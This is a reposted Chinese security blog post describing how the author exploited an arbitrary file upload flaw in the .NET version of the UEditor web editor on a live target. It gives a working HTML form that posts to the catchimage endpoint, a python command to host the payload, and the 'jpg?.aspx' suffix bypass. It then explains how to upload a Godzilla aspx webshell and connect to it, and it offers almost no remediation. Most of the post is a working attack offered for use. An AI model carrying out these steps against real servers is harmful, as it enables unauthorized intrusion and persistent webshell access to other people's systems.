记一次实战中遇到的UEditor.NET任意文件上传漏洞

admin 2022年6月22日04:12:03评论1,374 views字数 1169阅读3分53秒阅读模式
记一次实战中遇到的UEditor.NET任意文件上传漏洞
点击上方“蓝字”,发现更多精彩。

0x00 漏洞描述

Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。


0x01 漏洞简介

漏洞影响版本:该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。
漏洞原理:漏洞的成因是在获取图片资源时仅检查了Content-Type,导致可以绕过达到任意文件上传。


0x02 漏洞环境

这次不用搭建漏洞环境,实战直接遇到一个。

出现以下这个界面,大概率就会存在着任意文件上传。

记一次实战中遇到的UEditor.NET任意文件上传漏洞


0x03 漏洞复现

1.正常思路是首先要有一个aspx的免杀图片马,将准备好的图片马上传到自己的vps服务器上面,开启http服务,python -m SimpleHTTPServer 6969。但是我实际上传的时候图片马会被杀(或者是访问不到),所以俺是将aspx的马改为jpg格式上传。

记一次实战中遇到的UEditor.NET任意文件上传漏洞


2.在本地,将下面的代码保存为HTML文件,这样就可以利用post方法直接上传文件到目标网站啦,打开之后就是这个样子啦。

记一次实战中遇到的UEditor.NET任意文件上传漏洞

根据路径实际情况

<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]" /></p ><input type="submit" value="Submit"/></form>


3.双击打开刚刚创建的HTML文件,上传webshell,将后缀修改为:jpg?.aspx绕过,让服务器把文件解析成aspx文件,上传成功后将返回文件的上传路径。

记一次实战中遇到的UEditor.NET任意文件上传漏洞

记一次实战中遇到的UEditor.NET任意文件上传漏洞


4.拼接上传路径,查看效果,这里没有直接上马,因为只需要验证漏洞可以利用,不需要拿到shell。

记一次实战中遇到的UEditor.NET任意文件上传漏洞


0x04 GetShell

在实际的项目中是利用哥斯拉自己生成的木马getshell的。
首先利用哥斯拉生成功能,生成一个aspx的木马,有效载荷和加密方式如图所示:

记一次实战中遇到的UEditor.NET任意文件上传漏洞


利用刚才上传aspx文件的方法,将木马上传的目标服务器,根据返回的上传路径,拼接URL,利用哥斯拉连接webshell即可。

记一次实战中遇到的UEditor.NET任意文件上传漏洞


0x05 漏洞修复

1.修改CrawlerHandler.cs 增加对文件扩展名的

2.IPS等防御产品可以加入相应的特征



内容仅供学习及自我检测修复,根据此文造成的任何后果均由用户个人承担。



我知道你在看
记一次实战中遇到的UEditor.NET任意文件上传漏洞


原文始发于微信公众号(米瑞尔信息安全):记一次实战中遇到的UEditor.NET任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月22日04:12:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次实战中遇到的UEditor.NET任意文件上传漏洞https://cn-sec.com/archives/1133042.html

发表评论

匿名网友 填写信息